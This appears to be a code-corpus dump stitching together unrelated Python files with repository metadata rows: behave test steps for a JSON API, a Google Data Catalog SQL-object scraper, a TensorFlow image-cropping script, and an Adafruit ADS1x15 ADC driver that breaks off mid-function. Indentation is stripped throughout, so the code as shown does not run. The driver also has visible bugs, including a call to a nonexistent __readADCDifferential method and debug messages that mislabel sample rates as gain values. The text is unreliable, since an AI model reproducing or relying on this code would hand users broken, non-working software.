response_object = json.loads(context.response.data)
assert_that(
response_object['warning'],
is_(expected_warning)
)
step_matcher("re")
@then('the JSON should have "(?P<n>\d+)" results?')
def step(context, n):
response_data = json.loads(context.response.data)
assert_that('data' in response_data, response_data.get('message', None))
the_data = response_data['data']
assert_that(the_data, has_length(int(n)))
step_matcher("parse")
def parse_position(nth, data):
match = re.compile(r'\d+').match(nth)
if match:
return int(match.group(0)) - 1
elif nth == "last":
return len(data) - 1
elif nth == "first":
return 0
else:
raise IndexError(nth)
@then('the "{nth}" result should be "{expected_json}"')
def step(context, nth, expected_json):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
expected = json.loads(expected_json)
if '_updated_at' in the_data[i]:
del the_data[i]['_updated_at']
assert_that(the_data[i], is_(expected))
@then('the "{nth}" result should have "{key}" equaling "{value}"')
def step(context, nth, key, value):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
assert_that(the_data[i][key], equal_to(value))
@then('the "{nth}" result should have "{key}" equaling the integer "{value}"')
def step(context, nth, key, value):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
assert_that(the_data[i][key], equal_to(int(value)))
@then('the "{nth}" result should have "{key}" with item "{value}"')
def step(context, nth, key, value):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
assert_that(the_data[i][key], has_item(json.loads(value)))
@then('the "{nth}" result should have "{key}" with item with entries "{value}"')
def step(context, nth, key, value):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
assert_that(the_data[i][key], has_item(has_entries(json.loads(value))))
@then('the "{nth}" result should have "{key}" with json "{expected_json}"')
def impl(context, nth, key, expected_json):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
assert_that(the_data[i][key], is_(json.loads(expected_json)))
@then('the "{nth}" result should have a sub group with "{key}" with json "{expected_json}"')
def impl(context, nth, key, expected_json):
the_data = json.loads(context.response.data)['data']
i = parse_position(nth, the_data)
assert_that(the_data[i]['values'],
has_item(
has_entry(key, json.loads(expected_json))))
@then('the "{header}" header should be "{value}"')
def step(context, header, value):
assert_that(context.response.headers.get(header), is_(value))
@then('the "{header}" header should not be empty')
def step(context, header):
assert_that(context.response.headers.get(header), is_not(None))
assert_that(context.response.headers.get(header), is_not(''))
@then(u'the error message should be "{expected_message}"')
def impl(context, expected_message):
error_message = json.loads(context.response.data)['message']
assert_that(error_message, is_(expected_message))
| mit | 3,936,186,195,960,056,000 | 32.477551 | 92 | 0.656059 | false |
GoogleCloudPlatform/datacatalog-connectors-rdbms | google-datacatalog-rdbms-connector/src/google/datacatalog_connectors/rdbms/scrape/sql_objects/sql_objects_metadata_scraper.py | 1 | 2069 | #!/usr/bin/python
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from google.datacatalog_connectors.rdbms.common import constants
from google.datacatalog_connectors.rdbms.scrape import sql_objects
class SQLObjectsMetadataScraper:
def __init__(self, main_scraper):
self.main_scraper = main_scraper
def scrape(self, config, connection_args):
scraped_sql_object = {}
if connection_args and config and config.sql_objects_config:
sql_objects_config = config.sql_objects_config
for key, sql_object_config in sql_objects_config.items():
name = sql_object_config[constants.SQL_OBJECT_ITEM_NAME]
metadata_def = sql_object_config[
constants.SQL_OBJECT_ITEM_METADATA_DEF_KEY]
query = sql_object_config[constants.SQL_OBJECT_ITEM_QUERY_KEY]
logging.info(
'Scraping metadata for sql objects: {}'.format(key))
try:
dataframe = self.main_scraper.get_metadata_as_dataframe(
metadata_def, connection_args, query)
scraped_sql_object[name] = \
sql_objects.SQLObjectsMetadataNormalizer.normalize(
dataframe, metadata_def)
except: # noqa:E722
logging.exception(
'Failed to scrape sql object, ignoring: {}'.format(
key))
return scraped_sql_object
| apache-2.0 | -1,006,289,879,503,530,100 | 37.314815 | 78 | 0.628806 | false |
antkillerfarm/antkillerfarm_crazy | python/ml/PIL/imageprocess.py | 1 | 1619 | import numpy as np
import tensorflow as tf
from PIL import Image
def save_img(sess, tensor, name):
tensor0 = tf.transpose(tensor, perm=[1, 2, 0])
res = sess.run(tensor0)
tensor1 = tensor0.eval()
im = Image.fromarray(tensor1.astype('uint8'))
im.save(name)
'''
im = Image.open("example_image_227x227.jpg")
im1 = im.resize((300,300))
n0 = np.array(im1)
print(n0.shape)
np.savetxt("input_0_out0_300_300_3.tensor", n0.flatten(), fmt='%f')
'''
n1 = np.loadtxt('input_0_out0_300_300_3.tensor', dtype=np.float32)
input0 = n1.reshape((300, 300, 3))
im2 = Image.fromarray(input0.astype('uint8'))
im2.save("2.jpg")
with tf.Session() as sess:
input1 = tf.transpose(input0, perm=[2, 0, 1])
res = sess.run(input1)
np.savetxt("input_0_out0_3_300_300.tensor", input1.eval().flatten(), fmt='%f')
out_crop = tf.slice(input1, [0, 75, 75], [3, 150, 150])
res = sess.run(out_crop)
out_crop0 = out_crop.eval()
np.savetxt("out_crop0.tensor", out_crop0.flatten(), fmt='%f')
save_img(sess, out_crop0, "3.jpg")
out_reverse = tf.reverse(out_crop0, [0])
res = sess.run(out_reverse)
out_reverse0 = out_reverse.eval()
np.savetxt("out_reverse0.tensor", out_reverse0.flatten(), fmt='%f')
save_img(sess, out_reverse0, "4.jpg")
mean = [127, 127, 127]
scale = 1.0 / 128
out_mean0 = tf.transpose(out_reverse0, perm=[1, 2, 0])
out_mean1 = (out_mean0 - mean) * scale
out_mean2 = tf.transpose(out_mean1, perm=[2, 0, 1])
sess.run(out_mean2)
np.savetxt("out_mean2.tensor", out_mean2.eval().flatten(), fmt='%f')
| gpl-3.0 | -4,133,155,640,879,254,000 | 33.977778 | 82 | 0.617048 | false |
Saint-Joe/weewx | bin/weewx/drivers/Adafruit_ADS1x15/Adafruit_ADS1x15.py | 1 | 32166 | #!/usr/bin/python
import time
import smbus
#from Adafruit_I2C import Adafruit_I2C
# ===========================================================================
# ADS1x15 Class
#
# Originally written by K. Townsend, Adafruit (https://github.com/adafruit/Adafruit-Raspberry-Pi-Python-Code/tree/master/Adafruit_ADS1x15)
# Updates and new functions implementation by Pedro Villanueva, 03/2013.
# The only error in the original code was in line 57:
# __ADS1015_REG_CONFIG_DR_920SPS = 0x0050
# should be
# __ADS1015_REG_CONFIG_DR_920SPS = 0x0060
#
# NOT IMPLEMENTED: Conversion ready pin, page 15 datasheet.
# ===========================================================================
class ADS1x15:
i2c = None
# IC Identifiers
__IC_ADS1015 = 0x00
__IC_ADS1115 = 0x01
# Pointer Register
__ADS1015_REG_POINTER_MASK = 0x03
__ADS1015_REG_POINTER_CONVERT = 0x00
__ADS1015_REG_POINTER_CONFIG = 0x01
__ADS1015_REG_POINTER_LOWTHRESH = 0x02
__ADS1015_REG_POINTER_HITHRESH = 0x03
# Config Register
__ADS1015_REG_CONFIG_OS_MASK = 0x8000
__ADS1015_REG_CONFIG_OS_SINGLE = 0x8000 # Write: Set to start a single-conversion
__ADS1015_REG_CONFIG_OS_BUSY = 0x0000 # Read: Bit = 0 when conversion is in progress
__ADS1015_REG_CONFIG_OS_NOTBUSY = 0x8000 # Read: Bit = 1 when device is not performing a conversion
__ADS1015_REG_CONFIG_MUX_MASK = 0x7000
__ADS1015_REG_CONFIG_MUX_DIFF_0_1 = 0x0000 # Differential P = AIN0, N = AIN1 (default)
__ADS1015_REG_CONFIG_MUX_DIFF_0_3 = 0x1000 # Differential P = AIN0, N = AIN3
__ADS1015_REG_CONFIG_MUX_DIFF_1_3 = 0x2000 # Differential P = AIN1, N = AIN3
__ADS1015_REG_CONFIG_MUX_DIFF_2_3 = 0x3000 # Differential P = AIN2, N = AIN3
__ADS1015_REG_CONFIG_MUX_SINGLE_0 = 0x4000 # Single-ended AIN0
__ADS1015_REG_CONFIG_MUX_SINGLE_1 = 0x5000 # Single-ended AIN1
__ADS1015_REG_CONFIG_MUX_SINGLE_2 = 0x6000 # Single-ended AIN2
__ADS1015_REG_CONFIG_MUX_SINGLE_3 = 0x7000 # Single-ended AIN3
__ADS1015_REG_CONFIG_PGA_MASK = 0x0E00
__ADS1015_REG_CONFIG_PGA_6_144V = 0x0000 # +/-6.144V range
__ADS1015_REG_CONFIG_PGA_4_096V = 0x0200 # +/-4.096V range
__ADS1015_REG_CONFIG_PGA_2_048V = 0x0400 # +/-2.048V range (default)
__ADS1015_REG_CONFIG_PGA_1_024V = 0x0600 # +/-1.024V range
__ADS1015_REG_CONFIG_PGA_0_512V = 0x0800 # +/-0.512V range
__ADS1015_REG_CONFIG_PGA_0_256V = 0x0A00 # +/-0.256V range
__ADS1015_REG_CONFIG_MODE_MASK = 0x0100
__ADS1015_REG_CONFIG_MODE_CONTIN = 0x0000 # Continuous conversion mode
__ADS1015_REG_CONFIG_MODE_SINGLE = 0x0100 # Power-down single-shot mode (default)
__ADS1015_REG_CONFIG_DR_MASK = 0x00E0
__ADS1015_REG_CONFIG_DR_128SPS = 0x0000 # 128 samples per second
__ADS1015_REG_CONFIG_DR_250SPS = 0x0020 # 250 samples per second
__ADS1015_REG_CONFIG_DR_490SPS = 0x0040 # 490 samples per second
__ADS1015_REG_CONFIG_DR_920SPS = 0x0060 # 920 samples per second
__ADS1015_REG_CONFIG_DR_1600SPS = 0x0080 # 1600 samples per second (default)
__ADS1015_REG_CONFIG_DR_2400SPS = 0x00A0 # 2400 samples per second
__ADS1015_REG_CONFIG_DR_3300SPS = 0x00C0 # 3300 samples per second (also 0x00E0)
__ADS1115_REG_CONFIG_DR_8SPS = 0x0000 # 8 samples per second
__ADS1115_REG_CONFIG_DR_16SPS = 0x0020 # 16 samples per second
__ADS1115_REG_CONFIG_DR_32SPS = 0x0040 # 32 samples per second
__ADS1115_REG_CONFIG_DR_64SPS = 0x0060 # 64 samples per second
__ADS1115_REG_CONFIG_DR_128SPS = 0x0080 # 128 samples per second
__ADS1115_REG_CONFIG_DR_250SPS = 0x00A0 # 250 samples per second (default)
__ADS1115_REG_CONFIG_DR_475SPS = 0x00C0 # 475 samples per second
__ADS1115_REG_CONFIG_DR_860SPS = 0x00E0 # 860 samples per second
__ADS1015_REG_CONFIG_CMODE_MASK = 0x0010
__ADS1015_REG_CONFIG_CMODE_TRAD = 0x0000 # Traditional comparator with hysteresis (default)
__ADS1015_REG_CONFIG_CMODE_WINDOW = 0x0010 # Window comparator
__ADS1015_REG_CONFIG_CPOL_MASK = 0x0008
__ADS1015_REG_CONFIG_CPOL_ACTVLOW = 0x0000 # ALERT/RDY pin is low when active (default)
__ADS1015_REG_CONFIG_CPOL_ACTVHI = 0x0008 # ALERT/RDY pin is high when active
__ADS1015_REG_CONFIG_CLAT_MASK = 0x0004 # Determines if ALERT/RDY pin latches once asserted
__ADS1015_REG_CONFIG_CLAT_NONLAT = 0x0000 # Non-latching comparator (default)
__ADS1015_REG_CONFIG_CLAT_LATCH = 0x0004 # Latching comparator
__ADS1015_REG_CONFIG_CQUE_MASK = 0x0003
__ADS1015_REG_CONFIG_CQUE_1CONV = 0x0000 # Assert ALERT/RDY after one conversions
__ADS1015_REG_CONFIG_CQUE_2CONV = 0x0001 # Assert ALERT/RDY after two conversions
__ADS1015_REG_CONFIG_CQUE_4CONV = 0x0002 # Assert ALERT/RDY after four conversions
__ADS1015_REG_CONFIG_CQUE_NONE = 0x0003 # Disable the comparator and put ALERT/RDY in high state (default)
# Dictionaries with the sampling speed values
# These simplify and clean the code (avoid the abuse of if/elif/else clauses)
spsADS1115 = {
8:__ADS1115_REG_CONFIG_DR_8SPS,
16:__ADS1115_REG_CONFIG_DR_16SPS,
32:__ADS1115_REG_CONFIG_DR_32SPS,
64:__ADS1115_REG_CONFIG_DR_64SPS,
128:__ADS1115_REG_CONFIG_DR_128SPS,
250:__ADS1115_REG_CONFIG_DR_250SPS,
475:__ADS1115_REG_CONFIG_DR_475SPS,
860:__ADS1115_REG_CONFIG_DR_860SPS
}
spsADS1015 = {
128:__ADS1015_REG_CONFIG_DR_128SPS,
250:__ADS1015_REG_CONFIG_DR_250SPS,
490:__ADS1015_REG_CONFIG_DR_490SPS,
920:__ADS1015_REG_CONFIG_DR_920SPS,
1600:__ADS1015_REG_CONFIG_DR_1600SPS,
2400:__ADS1015_REG_CONFIG_DR_2400SPS,
3300:__ADS1015_REG_CONFIG_DR_3300SPS
}
# Dictionariy with the programable gains
pgaADS1x15 = {
6144:__ADS1015_REG_CONFIG_PGA_6_144V,
4096:__ADS1015_REG_CONFIG_PGA_4_096V,
2048:__ADS1015_REG_CONFIG_PGA_2_048V,
1024:__ADS1015_REG_CONFIG_PGA_1_024V,
512:__ADS1015_REG_CONFIG_PGA_0_512V,
256:__ADS1015_REG_CONFIG_PGA_0_256V
}
# Constructor
def __init__(self, address=0x48, ic=__IC_ADS1015, debug=False):
# Depending on if you have an old or a new Raspberry Pi, you
# may need to change the I2C bus. Older Pis use SMBus 0,
# whereas new Pis use SMBus 1. If you see an error like:
# 'Error accessing 0x48: Check your I2C address '
# change the SMBus number in the initializer below!
self.i2c = Adafruit_I2C(address)
self.address = address
self.debug = debug
# Make sure the IC specified is valid
if ((ic < self.__IC_ADS1015) | (ic > self.__IC_ADS1115)):
if (self.debug):
print "ADS1x15: Invalid IC specfied: %h" % ic
return -1
else:
self.ic = ic
# Set pga value, so that getLastConversionResult() can use it,
# any function that accepts a pga value must update this.
self.pga = 6144
def readADCSingleEnded(self, channel=0, pga=6144, sps=250):
"Gets a single-ended ADC reading from the specified channel in mV. \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see datasheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
# With invalid channel return -1
if (channel > 3):
if (self.debug):
print "ADS1x15: Invalid channel specified: %d" % channel
return -1
# Disable comparator, Non-latching, Alert/Rdy active low
# traditional comparator, single-shot mode
config = self.__ADS1015_REG_CONFIG_CQUE_NONE | \
self.__ADS1015_REG_CONFIG_CLAT_NONLAT | \
self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW | \
self.__ADS1015_REG_CONFIG_CMODE_TRAD | \
self.__ADS1015_REG_CONFIG_MODE_SINGLE
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init) it returns the value of the constant
# othewise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set the channel to be converted
if channel == 3:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_3
elif channel == 2:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_2
elif channel == 1:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_1
else:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_0
# Set 'start single-conversion' bit
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write config register to the ADC
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
# Wait for the ADC conversion to complete
# The minimum delay depends on the sps: delay >= 1/sps
# We add 0.1ms to be sure
delay = 1.0/sps+0.0001
time.sleep(delay)
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
return (val - 0xFFFF)*pga/32768.0
else:
return ( (result[0] << 8) | (result[1]) )*pga/32768.0
def readADCDifferential(self, chP=0, chN=1, pga=6144, sps=250):
"Gets a differential ADC reading from channels chP and chN in mV. \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
# Disable comparator, Non-latching, Alert/Rdy active low
# traditional comparator, single-shot mode
config = self.__ADS1015_REG_CONFIG_CQUE_NONE | \
self.__ADS1015_REG_CONFIG_CLAT_NONLAT | \
self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW | \
self.__ADS1015_REG_CONFIG_CMODE_TRAD | \
self.__ADS1015_REG_CONFIG_MODE_SINGLE
# Set channels
if ( (chP == 0) & (chN == 1) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_1
elif ( (chP == 0) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_3
elif ( (chP == 2) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_2_3
elif ( (chP == 1) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_1_3
else:
if (self.debug):
print "ADS1x15: Invalid channels specified: %d, %d" % (chP, chN)
return -1
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
# othewise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set 'start single-conversion' bit
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write config register to the ADC
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
# Wait for the ADC conversion to complete
# The minimum delay depends on the sps: delay >= 1/sps
# We add 0.1ms to be sure
delay = 1.0/sps+0.0001
time.sleep(delay)
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
val = ((result[0] << 8) | (result[1] & 0xFF)) >> 4
# (Take signed values into account as well)
if val >> 11:
val = val - 0xfff
return val*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
return (val - 0xFFFF)*pga/32768.0
else:
return ( (result[0] << 8) | (result[1]) )*pga/32768.0
def readADCDifferential01(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 0 and 1 in mV\
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.readADCDifferential(0, 1, pga, sps)
def readADCDifferential03(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 0 and 3 in mV \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.readADCDifferential(0, 3, pga, sps)
def readADCDifferential13(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 1 and 3 in mV \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.__readADCDifferential(1, 3, pga, sps)
def readADCDifferential23(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 2 and 3 in mV \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.readADCDifferential(2, 3, pga, sps)
def startContinuousConversion(self, channel=0, pga=6144, sps=250):
"Starts the continuous conversion mode and returns the first ADC reading \
in mV from the specified channel. \
The sps controls the sample rate. \
The pga must be given in mV, see datasheet page 13 for the supported values. \
Use getLastConversionResults() to read the next values and \
stopContinuousConversion() to stop converting."
# Default to channel 0 with invalid channel, or return -1?
if (channel > 3):
if (self.debug):
print "ADS1x15: Invalid channel specified: %d" % channel
return -1
# Disable comparator, Non-latching, Alert/Rdy active low
# traditional comparator, continuous mode
# The last flag is the only change we need, page 11 datasheet
config = self.__ADS1015_REG_CONFIG_CQUE_NONE | \
self.__ADS1015_REG_CONFIG_CLAT_NONLAT | \
self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW | \
self.__ADS1015_REG_CONFIG_CMODE_TRAD | \
self.__ADS1015_REG_CONFIG_MODE_CONTIN
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
# othewise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set the channel to be converted
if channel == 3:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_3
elif channel == 2:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_2
elif channel == 1:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_1
else:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_0
# Set 'start single-conversion' bit to begin conversions
# No need to change this for continuous mode!
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write config register to the ADC
# Once we write the ADC will convert continously
# we can read the next values using getLastConversionResult
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
# Wait for the ADC conversion to complete
# The minimum delay depends on the sps: delay >= 1/sps
# We add 0.5ms to be sure
delay = 1.0/sps+0.0005
time.sleep(delay)
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
return (val - 0xFFFF)*pga/32768.0
else:
return ( (result[0] << 8) | (result[1]) )*pga/32768.0
def startContinuousDifferentialConversion(self, chP=0, chN=1, pga=6144, sps=250):
"Starts the continuous differential conversion mode and returns the first ADC reading \
in mV as the difference from the specified channels. \
The sps controls the sample rate. \
The pga must be given in mV, see datasheet page 13 for the supported values. \
Use getLastConversionResults() to read the next values and \
stopContinuousConversion() to stop converting."
# Disable comparator, Non-latching, Alert/Rdy active low
# traditional comparator, continuous mode
# The last flag is the only change we need, page 11 datasheet
config = self.__ADS1015_REG_CONFIG_CQUE_NONE | \
self.__ADS1015_REG_CONFIG_CLAT_NONLAT | \
self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW | \
self.__ADS1015_REG_CONFIG_CMODE_TRAD | \
self.__ADS1015_REG_CONFIG_MODE_CONTIN
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
# othewise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % sps
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set channels
if ( (chP == 0) & (chN == 1) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_1
elif ( (chP == 0) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_3
elif ( (chP == 2) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_2_3
elif ( (chP == 1) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_1_3
else:
if (self.debug):
print "ADS1x15: Invalid channels specified: %d, %d" % (chP, chN)
return -1
# Set 'start single-conversion' bit to begin conversions
# No need to change this for continuous mode!
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write config register to the ADC
# Once we write the ADC will convert continously
# we can read the next values using getLastConversionResult
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
# Wait for the ADC conversion to complete
# The minimum delay depends on the sps: delay >= 1/sps
# We add 0.5ms to be sure
delay = 1.0/sps+0.0005
time.sleep(delay)
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
return (val - 0xFFFF)*pga/32768.0
else:
return ( (result[0] << 8) | (result[1]) )*pga/32768.0
def stopContinuousConversion(self):
"Stops the ADC's conversions when in continuous mode \
and resets the configuration to its default value."
# Write the default config register to the ADC
# Once we write, the ADC will do a single conversion and
# enter power-off mode.
config = 0x8583 # Page 18 datasheet.
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
return True
def getLastConversionResults(self):
"Returns the last ADC conversion result in mV"
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*self.pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
return (val - 0xFFFF)*self.pga/32768.0
else:
return ( (result[0] << 8) | (result[1]) )*self.pga/32768.0
def startSingleEndedComparator(self, channel, thresholdHigh, thresholdLow, \
pga=6144, sps=250, \
activeLow=True, traditionalMode=True, latching=False, \
numReadings=1):
"Starts the comparator mode on the specified channel, see datasheet pg. 15. \
In traditional mode it alerts (ALERT pin will go low) when voltage exceeds \
thresholdHigh until it falls below thresholdLow (both given in mV). \
In window mode (traditionalMode=False) it alerts when voltage doesn't lie\
between both thresholds.\
In latching mode the alert will continue until the conversion value is read. \
numReadings controls how many readings are necessary to trigger an alert: 1, 2 or 4.\
Use getLastConversionResults() to read the current value (which may differ \
from the one that triggered the alert) and clear the alert pin in latching mode. \
This function starts the continuous conversion mode. The sps controls \
the sample rate and the pga the gain, see datasheet page 13. "
# With invalid channel return -1
if (channel > 3):
if (self.debug):
print "ADS1x15: Invalid channel specified: %d" % channel
return -1
# Continuous mode
config = self.__ADS1015_REG_CONFIG_MODE_CONTIN
if (activeLow==False):
config |= self.__ADS1015_REG_CONFIG_CPOL_ACTVHI
else:
config |= self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW
if (traditionalMode==False):
config |= self.__ADS1015_REG_CONFIG_CMODE_WINDOW
else:
config |= self.__ADS1015_REG_CONFIG_CMODE_TRAD
if (latching==True):
config |= self.__ADS1015_REG_CONFIG_CLAT_LATCH
else:
config |= self.__ADS1015_REG_CONFIG_CLAT_NONLAT
if (numReadings==4):
config |= self.__ADS1015_REG_CONFIG_CQUE_4CONV
elif (numReadings==2):
config |= self.__ADS1015_REG_CONFIG_CQUE_2CONV
else:
config |= self.__ADS1015_REG_CONFIG_CQUE_1CONV
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
# othewise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
if ( (sps not in self.spsADS1015) & self.debug):
print "ADS1x15: Invalid sps specified: %d, using 1600sps" % sps
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
